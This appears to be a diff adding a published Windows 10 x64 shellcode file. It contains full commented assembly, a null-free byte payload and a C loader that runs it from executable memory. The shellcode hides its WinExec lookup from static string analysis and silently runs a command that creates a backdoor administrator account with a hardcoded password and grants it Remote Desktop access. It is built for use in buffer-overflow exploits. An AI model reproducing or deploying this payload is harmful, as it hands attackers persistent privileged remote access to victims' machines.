Bytes) +# Shellcode Author: Bobby Cooke (boku) +# Date: 02/05/2021 +# Tested on: Windows 10 v2004 (x64) +# Compiled from: Kali Linux (x86_64) +# Full Disclosure: github.com/boku7/x64win-AddRdpAdminShellcode +# Shellcode Description: +# 64bit Windows 10 shellcode that adds user BOKU:SP3C1ALM0V3 to the system and the localgroups +# Administrators & "Remote Desktop Users". Position Independent Code (PIC) that dynamically resolves +# KERNEL32 DLL via PEB & LDR. Shellcode contains no null bytes, and therefor can be used on typical +# stack based Buffer OverFlow vulnerabilities. Shellcode must be executed from a process with either +# a HIGH or SYSTEM integrity level. + +; nasm -f win64 addRdpAdmin.asm -o addRdpAdmin.o +; for i in $(objdump -D addRdpAdmin.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done +; Get kernel32.dll base address +xor rdi, rdi ; RDI = 0x0 +mul rdi ; RAX&RDX =0x0 +mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB +mov rbx, [rbx+0x18] ; RBX = Address_of_LDR +mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll +mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll +mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll +mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll) +mov r8, rbx ; RBX & R8 = &kernel32.dll + +; Get kernel32.dll ExportTable Address +mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader +add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader +xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add +add cx, 0x88ff +shr rcx, 0x8 ; RCX = 0x88ff --> 0x88 +mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable +add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable + +; Get &AddressTable from Kernel32.dll ExportTable +xor r10, r10 +mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable +add r10, r8 ; R10 = &AddressTable + +; Get &NamePointerTable from Kernel32.dll ExportTable +xor r11, r11 +mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable +add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable) + +; Get &OrdinalTable from Kernel32.dll ExportTable +xor r12, r12 +mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable +add r12, r8 ; R12 = &OrdinalTable + +jmp short apis + +; Get the address of the API from the Kernel32.dll ExportTable +getapiaddr: +pop rbx ; save the return address for ret 2 caller after API address is found +pop rcx ; Get the string length counter from stack +xor rax, rax ; Setup Counter for resolving the API Address after finding the name string +mov rdx, rsp ; RDX = Address of API Name String to match on the Stack +push rcx ; push the string length counter to stack +loop: +mov rcx, [rsp] ; reset the string length counter from the stack +xor rdi,rdi ; Clear RDI for setting up string name retrieval +mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] +add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll +mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string) +repe cmpsb ; Compare strings at RDI & RSI +je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API +incloop: +inc rax +jmp short loop + +; Find the address of GetProcAddress by using the last value of the Counter +resolveaddr: +pop rcx ; remove string length counter from top of stack +mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32. +mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber] +add rax, r8 ; RAX = Kernel32. = RVA kernel32. + kernel32.dll BaseAddress +push rbx ; place the return address from the api string call back on the top of the stack +ret ; return to API caller + +apis: ; API Names to resolve addresses +; WinExec | String length : 7 +xor rcx, rcx +add cl, 0x7 ; String length for compare string +mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec +not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis +shr rax, 0x8 ; cexEniW,0xF0 --> 0x00,cexEniW +push rax +push rcx ; push the string length counter to stack +call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable +mov r14, rax ; R14 = Kernel32.WinExec Address + +jmp short command + +WinExec: +; UINT WinExec( +; LPCSTR lpCmdLine, => RCX = + 0x00 (Null Terminated) +; UINT uCmdShow => RDX = 0x0 = SW_HIDE +; ); +xor rdx, rdx ; RDX = 0x0 = SW_HIDE +sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA) +call r14 ; Call WinExec(, SW_HIDE) +add rsp, 0x20 ; Fix stack +ret + +command: +; WinExec("cmd.exe /c net user BOKU SP3C1ALM0V3 /add && net localgroup Administrators BOKU /add && net localgroup \"Remote Desktop Users\" BOKU /add", 0x0); +; 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 75 cmd.exe /c net u +; 73 65 72 20 42 4F 4B 55 20 53 50 33 43 31 41 4C ser BOKU SP3C1AL +; 4D 30 56 33 20 2F 61 64 64 20 26 26 20 6E 65 74 M0V3 /add && net +; 20 6C 6F 63 61 6C 67 72 6F 75 70 20 41 64 6D 69 localgroup Admi +; 6E 69 73 74 72 61 74 6F 72 73 20 42 4F 4B 55 20 nistrators BOKU +; 2F 61 64 64 20 26 26 20 6E 65 74 20 6C 6F 63 61 /add && net loca +; 6C 67 72 6F 75 70 20 22 52 65 6D 6F 74 65 20 44 lgroup "Remote D +; 65 73 6B 74 6F 70 20 55 73 65 72 73 22 20 42 4F esktop Users" BO +; 4B 55 20 2F 61 64 64 00 KU /add. +; String length : 135 +mov rax, 0x6464612f20554bFF ; dda/ UK : 6464612f20554b +shr rax, 0x8 +push rax +mov rax, 0x4f42202273726573 ; OB "sres : 4f42202273726573 +push rax +mov rax, 0x5520706f746b7365 ; U potkse : 5520706f746b7365 +push rax +mov rax, 0x442065746f6d6552 ; D etomeR : 442065746f6d6552 +push rax +mov rax, 0x222070756f72676c ; " puorgl : 222070756f72676c +push rax +mov rax, 0x61636f6c2074656e ; acol ten : 61636f6c2074656e +push rax +mov rax, 0x202626206464612f ; && dda/ : 202626206464612f +push rax +mov rax, 0x20554b4f42207372 ; UKOB sr : 20554b4f42207372 +push rax +mov rax, 0x6f7461727473696e ; otartsin : 6f7461727473696e +push rax +mov rax, 0x696d64412070756f ; imdA puo : 696d64412070756f +push rax +mov rax, 0x72676c61636f6c20 ; rglacol : 72676c61636f6c20 +push rax +mov rax, 0x74656e2026262064 ; ten && d : 74656e2026262064 +push rax +mov rax, 0x64612f203356304d ; da/ 3V0M : 64612f203356304d +push rax +mov rax, 0x4c41314333505320 ; LA1C3PS : 4c41314333505320 +push rax +mov rax, 0x554b4f4220726573 ; UKOB res : 554b4f4220726573 +push rax +mov rax, 0x752074656e20632f ; u ten c/ : 752074656e20632f +push rax +mov rax, 0x206578652e646d63 ; exe.dmc : 206578652e646d63 +push rax +mov rcx, rsp ; RCX = ,0x0 +call WinExec + +########################################################################################################################################### + +#include +// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net) +int main(void) { + void* exec_mem; + BOOL rv; + HANDLE th; + DWORD oldprotect = 0; + + unsigned char payload[] = + "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49" + "\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44" + "\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59" + "\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff" + "\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91" + "\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0\xff\xff\xff\x49\x89\xc6\xeb\x0f\x48\x31\xd2\x48\x83\xec\x20" + "\x41\xff\xd6\x48\x83\xc4\x20\xc3\x48\xb8\xff\x4b\x55\x20\x2f\x61\x64\x64\x48\xc1\xe8\x08\x50\x48\xb8\x73\x65\x72\x73\x22" + "\x20\x42\x4f\x50\x48\xb8\x65\x73\x6b\x74\x6f\x70\x20\x55\x50\x48\xb8\x52\x65\x6d\x6f\x74\x65\x20\x44\x50\x48\xb8\x6c\x67" + "\x72\x6f\x75\x70\x20\x22\x50\x48\xb8\x6e\x65\x74\x20\x6c\x6f\x63\x61\x50\x48\xb8\x2f\x61\x64\x64\x20\x26\x26\x20\x50\x48" + "\xb8\x72\x73\x20\x42\x4f\x4b\x55\x20\x50\x48\xb8\x6e\x69\x73\x74\x72\x61\x74\x6f\x50\x48\xb8\x6f\x75\x70\x20\x41\x64\x6d" + "\x69\x50\x48\xb8\x20\x6c\x6f\x63\x61\x6c\x67\x72\x50\x48\xb8\x64\x20\x26\x26\x20\x6e\x65\x74\x50\x48\xb8\x4d\x30\x56\x33" + "\x20\x2f\x61\x64\x50\x48\xb8\x20\x53\x50\x33\x43\x31\x41\x4c\x50\x48\xb8\x73\x65\x72\x20\x42\x4f\x4b\x55\x50\x48\xb8\x2f" + "\x63\x20\x6e\x65\x74\x20\x75\x50\x48\xb8\x63\x6d\x64\x2e\x65\x78\x65\x20\x50\x48\x89\xe1\xe8\x2a\xff\xff\xff"; + unsigned int payload_len = 387; + + exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + // Copy payload to new buffer + RtlMoveMemory(exec_mem, payload, payload_len); + // Make new buffer as executable + rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); + // If all good, run the payload + if (rv != 0) { + th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0); + WaitForSingleObject(th, -1); + } + return 0; +} \ No newline at end of file